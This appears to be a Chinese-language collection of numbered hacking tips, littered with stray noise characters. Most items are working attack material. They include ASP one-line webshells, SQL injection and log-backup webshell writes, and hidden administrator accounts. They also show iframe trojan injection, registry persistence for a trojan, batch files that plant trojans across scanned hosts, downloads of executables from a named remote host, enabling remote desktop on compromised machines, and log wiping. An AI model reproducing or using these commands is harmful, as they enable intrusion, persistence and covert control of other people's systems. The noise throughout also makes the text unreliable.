Xp系统修改权限防止病毒或木马等破坏系统,cmd下,8 l/ Y. g4 p { d& Z% M, [8 W) S
cacls C:\windows\system32 /G hqw20:R
$ }4 v5 |" b0 l' y- O e思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
1 z* G; m0 o: f9 ?恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F/ ]/ m7 {0 w2 o" }
" X4 J. D' T; f2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
( w2 Z4 A5 K: }# `; L8 _) n
" e1 V& d; q, _* g2 E1 k) J3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
" P0 ?% V2 \, h. u6 @! J$ X$ g, l3 j/ N2 m: m
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
2 Q3 G8 w- c8 Z0 y: w9 U2 l8 w
9 ? s% u( U# o0 J4 ~5、利用INF文件来修改注册表
_+ S0 o6 q2 f! G2 N8 ]0 y[Version]1 D; o( y0 G0 v2 }9 W5 P
Signature="$CHICAGO$"! i Q7 V+ {' G: ~' `( F9 v7 \
[Defaultinstall]4 ~! x5 \0 ^) }5 x, P7 A
addREG=Ating
& J2 F2 r* A$ T: |% W1 |& k( O" k[Ating]5 w# C a1 M$ F9 a( X) ]+ f
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"8 s& m+ R1 I; [1 X9 S
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
9 ~7 `$ w( x5 c7 y" Drundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径; }; T, e/ p7 U+ [( o
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU$ M! m6 r# k- i0 S* D6 S% R, W
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
2 X$ D" t: j1 _& {0 n/ T3 }HKEY_CURRENT_CONFIG 简写为 HKCC0 b& T& G9 p0 }% q
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
3 v* J& {! d, S' N* d"1"这里代表是写入或删除注册表键值中的具体数据3 f' @. X/ P3 ]7 B# v# {- J$ P& U
& A2 i; q& t1 |3 {: f
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,4 i% s5 S3 R0 R$ I" i4 ?
多了一步就是在防火墙里添加个端口,然后导出其键值4 ], A; A6 K5 q ^. C
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
h0 \( E. v2 X3 M: `0 T6 m* K, G7 ]2 l& s* e& Q& q* s' J
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽4 r% f1 w( m6 n8 F
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。; m. s% `1 M- R0 s* Y3 @
9 z; B# J1 P- |2 e7 M8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
+ W- O: z) @# N: S
4 p: r% X* P' }4 w) Q9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,, z/ g; J; k$ M7 G& }4 {: y4 O
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
! N/ @2 B* E- @' z, w7 \8 S" W
8 A N) \1 D! j& g* i10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”$ ?$ d; K* A+ k1 Q) @
4 `9 y4 S* m0 r" C& b8 m! j11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
6 M. A. P$ } `5 s* P/ g用法:xsniff –pass –hide –log pass.txt1 l" ?& a+ ~" e2 V0 ]
% _3 B, m4 G0 n. y
12、google搜索的艺术
\ _/ g2 m5 ?- h搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
; R/ r: G1 e0 g& F+ K3 \+ Z0 X. D4 r或“字符串的语法错误”可以找到很多sql注入漏洞。
) J% y' c/ j7 C* v6 u( n/ O+ P7 T& B- p% I
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
m8 d* I' s; `! L
" U, ]: S- _. I6 }5 @5 H3 Y; m; J14、cmd中输入 nc –vv –l –p 1987% C6 y4 y. e' Y
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃* ^7 M; C4 G- H
% X9 H6 r" Z7 H# b: O; K% O [' p
15、制作T++木马,先写个ating.hta文件,内容为
; W2 n$ D2 E- F, c<script language="VBScript">' \7 Y ]5 z3 h8 t
set wshshell=createobject ("wscript.shell" )
5 |. Z- N* ~) \( A* t+ Sa=wshshell.run("你马的名称",1). l" X( b( |& _) X, |& R0 R
window.close
( ^% g3 }- V6 b2 |) y9 E</script>/ G' s7 ]5 H( u, \
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
. n$ r- _/ { P q8 I6 s) Y7 A3 N- C& z$ _! s L8 Y
16、搜索栏里输入' w4 @9 T8 F# a
关键字%'and 1=1 and '%'='
0 J4 b* g1 M0 L4 l% ^关键字%'and 1=2 and '%'='
: c6 a: E6 a3 h% ~5 C+ X比较不同处 可以作为注入的特征字符* W" N) l4 p; [& v! p8 V& G+ ?
1 _) ?# r4 K* L7 i
17、挂马代码<html>
: p2 B9 n% X/ X' u8 ]% Y T<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>7 j/ r) J$ j7 M0 J- ^& v
</html>
4 q+ c4 @+ d7 o& a/ g
3 N9 W7 J& Z, n18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
) `% i" J+ q2 f" v3 M& unet localgroup administrators还是可以看出Guest是管理员来。
5 q$ M& q; }; ]; @* [
! J) E/ M. ~9 R- D4 l" g19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
z6 \. K& y( g* O用法: 安装: instsrv.exe 服务名称 路径. S* ?' U! ]; s
卸载: instsrv.exe 服务名称 REMOVE; i; o# Z M: j
6 u C- L5 m7 h# F7 H+ R1 C
8 |6 |' _- B9 w0 @21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉' [$ H* v- I2 V- G m3 n7 @4 o
不能注入时要第一时间想到%5c暴库。0 Q7 M8 [# \! Z/ g8 p: L) A7 A, A4 r
/ M& @3 w" L. o# s5 S* U
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~- N! ~& }% l T& ^6 @" a
% I& r" h1 b# c23、缺少xp_cmdshell时
$ ^! }. E0 j- f- v9 c3 [尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
% H P9 Z0 D5 F( H4 |! p* o# G假如恢复不成功,可以尝试直接加用户(针对开3389的)
/ L, N8 @2 A8 q5 ]& ~. d" Jdeclare @o int1 b/ R) J2 d& \
exec sp_oacreate 'wscript.shell',@o out
9 Y: |3 R: U( D; K3 z. ^, ~0 bexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
2 }- W K" j1 ]7 E% H8 e* S/ T4 M! J( ~: m! g. z3 x6 u1 I
24.批量种植木马.bat3 X: v. B3 Q6 R
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中, N) G- |, B* ?) U
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
; ~( B& _/ k) c+ h" z扫描地址.txt里每个主机名一行 用\\开头
6 [% @0 h w5 ^. u9 b4 ?1 i! i L6 P0 s: f0 U% m5 \ H1 Y
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。0 `" G3 U. N+ Q- S0 o" U5 h, H: z
8 v4 s2 x' T% T) I1 \! m26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.' m- ]3 ~$ @0 Y* T0 |7 b$ M
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
+ w: N7 o4 Z' Z.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
; U, a6 X& @ F
) |1 [( j. m' v3 |0 d27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
% d6 L; z8 a; G( m9 [& o2 S' U8 e/ C然后用#clear logg和#clear line vty *删除日志6 i d/ S7 C# Y( P) V7 B, X
% q; P% T! U+ V- Z8 t& c28、电脑坏了省去重新安装系统的方法- h, w! V6 L; [( ~1 @9 F4 e
纯dos下执行,
5 u5 o, A" ^( ]xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config" k$ i6 F+ R; k! ^5 ~3 Q1 S
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config4 U7 Q9 o2 y. e8 I1 m/ o
( q( R4 c; g5 p29、解决TCP/IP筛选 在注册表里有三处,分别是:) R: x& e$ z# J* D
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
* q q. p1 M( ^3 S8 \5 j/ ~& hHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
& m7 O: f' B$ m' R: R! Y) a2 UHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip C- c9 [* \! a! [+ D6 q$ G
分别用$ a0 S' C! A. D8 l
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 w& I! @) Y' |! ~9 j% j$ ?regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ }/ ~, P( R% ]/ y# E' Q9 Hregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 F+ b: w! R" E1 v命令来导出注册表项
0 D+ j& X0 D! Y/ {然后把三个文件里的EnableSecurityFilters"=dword:00000001,
& b7 X6 O0 m1 q& ]/ ~改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
4 {, [' w. e% {regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
! ?; B- p: ]$ P, }: a+ t7 h5 Y. T$ ~3 N% ^/ I$ {$ L3 @
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U( q3 S" G/ m9 t, n
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的34 Z( @$ ~8 P: o
$ w1 |; F1 R1 x7 V31、全手工打造开3389工具; s# D: J* a) n0 o- c* }
打开记事本,编辑内容如下:% o' d8 ~5 E' ?6 A: s8 S) m2 J
echo [Components] > c:\sql3 V% k4 l, C/ D
echo TSEnable = on >> c:\sql8 P, [4 `, c# U3 m9 C: R6 q2 i
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
1 O" h' g! a4 a2 T1 m5 Q2 a# I编辑好后存为BAT文件,上传至肉鸡,执行
9 E7 s) {: y; V) \$ b
" n* W7 h% t/ I8 _8 ^# ^" y, `32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
' h% V! I# p; T) x+ D
+ j. F; {0 k7 `2 ]( V33、让服务器重启
* ]6 ?$ j% t% z1 X) ?! ]0 ]写个bat死循环:6 i! y5 D1 s/ M8 R/ F1 `
@echo off R1 x7 A1 @' `
:loop11 u# U4 N# F' F9 Z" d
cls! z/ Q2 y4 h2 ^0 b- v: P' a8 h9 Y
start cmd.exe
' I0 |$ b4 l r! h4 Ygoto loop1
7 p* I/ ^2 `. a( F7 |保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
8 E/ x8 ]" b9 j9 f7 H9 J+ c# K$ K6 ?
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
5 k8 K: [" l$ V0 o@echo off- z$ U/ \7 t0 {/ G' I% J
date /t >c:/3389.txt( G8 |8 i3 R# d2 {
time /t >>c:/3389.txt6 K( W4 w6 p6 B6 P u3 j
attrib +s +h c:/3389.bat4 B( o: o: i8 |* D# V* {$ t
attrib +s +h c:/3389.txt
8 e- j0 O0 w: @2 h! Q( s: ynetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt+ g1 X @/ I4 z! t( V% `
并保存为3389.bat
( c. g1 k9 l1 [. c9 J- _5 Q打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
* w, \ u( l. p5 `- o5 i4 z- l6 x! {8 W2 M4 H' t8 a' }7 i; X
35、有时候提不了权限的话,试试这个命令,在命令行里输入:; V; p# E' m, Y" L# J+ _, S
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
+ h2 U& o6 e: h) m& ?输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
, ]. p: \. L L- A& \: Z [; I5 H2 }. G+ V# d( O2 t& e" A3 G
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
, v- H6 j- s O( \7 z) h& xecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址* [) ?( Z/ x% E; _8 N" y4 L! z
echo 你的FTP账号 >>c:\1.bat //输入账号7 m- D# [7 A& f2 a! U7 F% H
echo 你的FTP密码 >>c:\1.bat //输入密码( v) ?2 t+ v& Y
echo bin >>c:\1.bat //登入
3 q4 U, C! y8 j8 F, Decho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
y# r+ U; c4 F( Lecho bye >>c:\1.bat //退出; W8 L3 l& p/ I; x
然后执行ftp -s:c:\1.bat即可
1 I' d) X% m1 I& J9 g$ h
; A% u2 s: r+ J0 }! O9 l37、修改注册表开3389两法9 v! W0 X+ @% H* Q# I. j
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表3 S% y- Q2 U; q9 p% a
echo Windows Registry Editor Version 5.00 >>3389.reg7 y8 y" H/ H( r! `' R x" z# ^
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
0 z1 D7 l" e5 }1 s: F+ [% d9 [0 t+ qecho "Enabled"="0" >>3389.reg
5 k8 y9 c1 g; S: Q" c* R" `0 t, secho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
@. k; y9 l. `7 u ENT\CurrentVersion\Winlogon] >>3389.reg
+ `- {, c; b4 |echo "ShutdownWithoutLogon"="0" >>3389.reg
5 y. L6 v! Y% w, R' j3 [+ Qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]+ ]$ G0 T$ O" _ ]4 M' \
>>3389.reg
g, `: @* q& x" R& T8 C/ B% q6 F+ ~echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
' u* N' v3 V wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]8 } N2 v* F6 d) k6 l
>>3389.reg
( D2 @% O5 D8 ]: R' F! Techo "TSEnabled"=dword:00000001 >>3389.reg
2 w8 `0 c0 J9 i# Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
. o3 l$ m2 o, k* L* [& R. m- Eecho "Start"=dword:00000002 >>3389.reg
& T3 K3 M% y1 a& W, e- F; lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
, b5 X$ w/ Z1 F4 q' [6 Z/ A>>3389.reg. ~9 E! G7 `# q+ O* C! x
echo "Start"=dword:00000002 >>3389.reg- Z3 H# P* T$ \6 R1 s( V
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
# z! }* s: F6 M+ ]6 z& P- Pecho "Hotkey"="1" >>3389.reg3 ~8 Z, I8 Q7 s/ u u0 N7 T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 e5 I z9 X! s# ~Server\Wds\rdpwd\Tds\tcp] >>3389.reg( k% v9 P2 n: x$ U
echo "PortNumber"=dword:00000D3D >>3389.reg1 F' [7 @' c+ I/ V. R4 q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 O2 t8 h l. B
Server\WinStations\RDP-Tcp] >>3389.reg
6 U' u: y1 @6 y8 ?5 f/ {echo "PortNumber"=dword:00000D3D >>3389.reg
$ _# \# T# |8 J4 I把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。4 ]5 B! z9 O) x( J$ j. O- l% K
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
+ G. T6 a0 R$ C6 B/ k' {. Z5 v因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效# F; ~, u' s/ ^% p1 _5 i W& i
(2)winxp和win2003终端开启
& j* M2 l- a3 q8 E用以下ECHO代码写一个REG文件:
" ^) g3 B% b- y9 Y8 B! Xecho Windows Registry Editor Version 5.00>>3389.reg
( r: Q _7 R$ ^- qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 @/ j, l1 z# l# q9 nServer]>>3389.reg) [' i. i/ F+ z* f* ~& E4 P4 x2 \
echo "fDenyTSConnections"=dword:00000000>>3389.reg: h( x6 v, `! D0 W. G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal ~7 r5 H8 L t) b8 D
Server\Wds\rdpwd\Tds\tcp]>>3389.reg8 {9 p" X; e5 j7 u2 }! B. }1 J4 E4 L
echo "PortNumber"=dword:00000d3d>>3389.reg
7 R+ ]+ k7 D# g5 B+ `$ F- b( Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 z' y, Y8 k/ B2 E
Server\WinStations\RDP-Tcp]>>3389.reg
& c6 V- H' ~4 T0 e* a9 E6 Eecho "PortNumber"=dword:00000d3d>>3389.reg! Z0 ~1 y1 R- C. P8 }$ V6 L" L6 t, @/ O
然后regedit /s 3389.reg del 3389.reg
" l! e/ ]& r: u- [! X. jXP下不论开终端还是改终端端口都不需重启 }- ?3 @# [' I5 R5 I
: ?* g5 r, j8 R% S+ d8 n6 Z4 s38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃& D1 U' r4 q- P% z1 R: ~
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
6 f! |( M* v+ w- q' U U
4 R" m8 @+ V0 r/ x7 \( m1 f39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!3 J/ p# C* x7 K# b* Z; B
(1)数据库文件名应复杂并要有特殊字符, {4 j( d( g9 G h* _5 ~
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
! D2 V# ?, @* F( u# F# B将conn.asp文档中的5 \: n; _$ |/ [
DBPath = Server.MapPath("数据库.mdb"): V- k+ i8 ^! t* \2 K
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
, G/ f8 K U. |" w8 h1 E! {* z! `% z3 ^3 p! f( W
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
2 w- s) c( o# l7 U9 F/ {(3)不放在WEB目录里
& h7 p- \2 e# S- w4 G
; A$ {3 k v$ l7 d/ Y( d0 m8 l% m4 O40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉/ Q- I0 X; ^+ c3 \6 p
可以写两个bat文件
% l4 N4 r( ]5 j@echo off
8 a! L, O! e o' G0 G@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
+ [$ I# G' d; {, q$ g( Y' F- C@del c:\winnt\system32\query.exe* a- n* i4 U' D$ w
@del %SYSTEMROOT%\system32\dllcache\query.exe [% X& Q' `3 X3 B: v. B# v5 l
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的, V8 w. ^* Y# r% l
0 g2 y; R& z% ^( K@echo off
& Y ]8 P+ R6 r- v9 |5 d@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe, n2 U7 z5 {1 \- ?# q
@del c:\winnt\system32\tsadmin.exe s: N. X8 Z, n7 m) \+ o
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex: E% E! `" h) Y4 \- p
9 x+ n* W, h/ ^1 {& v# T6 U
41、映射对方盘符
9 O; ]) ~4 Z% {' O; F* A4 w% j9 ^telnet到他的机器上,
& J- R; p3 Z& j- a7 [0 \1 I/ dnet share 查看有没有默认共享 如果没有,那么就接着运行6 i" P# _2 i5 \. F% h& R
net share c$=c:, o0 X) {" V D9 M
net share现在有c$# N" X+ ~+ X8 r3 C! |( q
在自己的机器上运行
" k% I2 i3 p: n7 G4 j! K# Mnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
/ D! g% R: M6 P( {5 z% }; N3 R8 K. O4 M+ i# @7 l$ O
42、一些很有用的老知识
4 }( E/ ^1 U! l. itype c:\boot.ini ( 查看系统版本 )+ X, y3 o) p Y" w$ s! O
net start (查看已经启动的服务)1 W8 J2 x8 _/ U! ^) w
query user ( 查看当前终端连接 )
4 @7 @) i7 q: X0 h: U) B5 a* {net user ( 查看当前用户 )% k/ m# h0 C! ^7 m" U
net user 用户 密码/add ( 建立账号 )1 U5 v8 G3 O1 @3 ~2 f- z
net localgroup administrators 用户 /add (提升某用户为管理员)
# f$ _, ~: ]6 A U9 t) _7 P ripconfig -all ( 查看IP什么的 )8 T/ w, g1 z4 g/ y) [' F0 W
netstat -an ( 查看当前网络状态 ) ? c' n, p2 W1 ~% A" X! s+ ?8 ?1 f
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
7 R9 C5 e- W$ v& l, y" z( f克隆时Administrator对应1F4
3 E" c0 b2 @% r6 \; W. k5 @guest对应1F5
/ w! ^$ F" l: ttsinternetuser对应3E8- }& n% t: M6 P- w& |/ H: ^
) e9 D7 `9 s+ c6 O) y# U8 O
43、如果对方没开3389,但是装了Remote Administrator Service0 a# `+ `8 M9 _2 l P/ O
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接% V) Q" ]3 ]7 u; I' {
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
7 |. z7 j. L1 Y8 X- ?先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"5 Q2 G' ^7 M" Z! K5 h, u
. P) ?7 M! O; f. K
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)3 ?& I8 S5 E" U3 e
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口); M6 {: ^; o# V# Q
( E7 L' N" T) j4 {( k3 p7 }
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)- P+ v- r x g8 w
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open7 b& r* o+ j1 H( S
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
3 s! A/ @$ U# Z4 u0 c& L0 q1 }CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
% N) c5 v6 D* A1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs4 E$ \* J7 b; ] j2 F7 ]( A; ~
(这是完整的一句话,其中没有换行符)% q8 b1 M) K$ T9 E' J' w( N
然后下载:2 {# c" V% n+ x
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
; g6 }1 @" w% y5 p
8 S' p' B/ [5 n5 z- j3 q2 Q3 d. O& V+ V46、一句话木马成功依赖于两个条件:! n! d; C+ W- h' ^/ N
1、服务端没有禁止adodb.Stream或FSO组件
8 x2 W3 L8 f/ {# Y1 z2 _2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
) y8 U5 d3 W0 c+ N$ I; h+ }) v* K" g- L7 P
47、利用DB_OWNER权限进行手工备份一句话木马的代码:2 a* f( I. E- h J! M
;alter database utsz set RECOVERY FULL--+ v3 e. C9 ^) i d+ X
;create table cmd (a image)--, q4 [( y v) ~' }
;backup log utsz to disk = 'D:\cmd' with init--" p: N4 H6 b7 R( \2 [
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--; `$ }0 U4 F+ g: q3 K
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--- J9 R; a8 ?2 m# s5 w
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
- c- f$ A- g0 G+ J5 j' p, L( Z k3 k0 ?8 Z* Q
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:9 b; W( a" B6 [) S" A4 }
5 y, {4 l6 W3 B" i& P/ J% U5 t8 `用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
2 @/ Q9 p4 H% Q8 E4 J4 N$ A* ?所有会话用 'all'。
+ l5 d+ v: m" F" w* k-s sessionid 列出会话的信息。- y/ [( C3 [. i! [
-k sessionid 终止会话。6 z! ]; x- u" A; D/ N' b+ p
-m sessionid 发送消息到会话。
. P) E, e9 z6 h' Y+ f4 [- P7 E1 A7 A6 B$ H
config 配置 telnet 服务器参数。6 Z. p, {' d+ Z! M0 A
. f) k) o, x0 b. C/ Ccommon_options 为:" y% {. _, X7 S" N5 r
-u user 指定要使用其凭据的用户 |& g' K6 i8 t: ~2 K
-p password 用户密码
" Q) v6 a L" ?' z" L& f! a, X. [% l, g% q* H* b& n
config_options 为:
' p+ L B. F6 d( S: |* G. fdom = domain 设定用户的默认域, c* P9 R3 r1 z% U' z7 H' U
ctrlakeymap = yes|no 设定 ALT 键的映射
3 x. L n1 b# |; O0 o9 W+ x. ~) Otimeout = hh:mm:ss 设定空闲会话超时值1 V6 v/ A% v8 E {7 t# p7 n" @
timeoutactive = yes|no 启用空闲会话。2 p' u) [; m% R% x$ F# r9 E. P
maxfail = attempts 设定断开前失败的登录企图数。
7 u; T2 t1 ]1 Kmaxconn = connections 设定最大连接数。
& ?% z+ U* y( I2 q( S) Iport = number 设定 telnet 端口。
3 W0 t: l% ~ g$ Esec = [+/-]NTLM [+/-]passwd
/ |" A- c [& c* ?) }, d0 d* [# [- m设定身份验证机构7 Q( z8 z+ ^% M& j/ g
fname = file 指定审计文件名。
! a/ P- E6 t6 u1 S# b. h/ zfsize = size 指定审计文件的最大尺寸(MB)。
$ R7 x1 ?* Q4 t; M) B/ vmode = console|stream 指定操作模式。
3 q. t! k5 b6 e; T9 Vauditlocation = eventlog|file|both% ~9 Y/ z! @4 [3 G3 U) I4 b
指定记录地点
' p. b1 a+ X6 T- jaudit = [+/-]user [+/-]fail [+/-]admin6 Q' \" u5 B) y b
/ c. u& Y! E: }3 a8 y9 N3 s# J49、例如:在IE上访问:5 V/ G* z( c5 M) S
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/7 H3 A0 N# D0 w' F' I
hack.txt里面的代码是:
0 E) V" a9 ?$ N7 A<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
) A& b' V& w5 u, {1 ^1 S把这个hack.txt发到你空间就可以了!
& e1 m: ^ G+ M这个可以利用来做网马哦!
3 E1 l( m. a" O# i/ R. h$ U# E) p
" Y; [: F; q3 ^6 ?2 j4 k50、autorun的病毒可以通过手动限制!
6 \$ C. S0 _6 T; f% k1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
, S* i5 `2 H' U2 w" c0 S2,打开盘符用右键打开!切忌双击盘符~5 P2 I# A0 p/ y3 T% |
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
& h7 @- p6 G( f, ~% S, ^" R! N1 V2 X2 E* Q( Y6 A% t
51、log备份时的一句话木马:( l# X. i5 K& Y( y: K. g
a).<%%25Execute(request("go"))%%25>
$ r; ]# x) ?5 |* E- n" U# _2 |7 Tb).<%Execute(request("go"))%>
$ V0 f" _7 m& V* w' Lc).%><%execute request("go")%><%
% H2 c9 Q& @ R8 d8 nd).<script language=VBScript runat=server>execute request("sb")</Script>+ I$ T1 L$ t5 [
e).<%25Execute(request("l"))%25>
% x: Z- o( r; u1 uf).<%if request("cmd")<>"" then execute request("pass")%>; G( y: o/ Z# X
; r y% S+ ]6 P: t% e% H
52、at "12:17" /interactive cmd
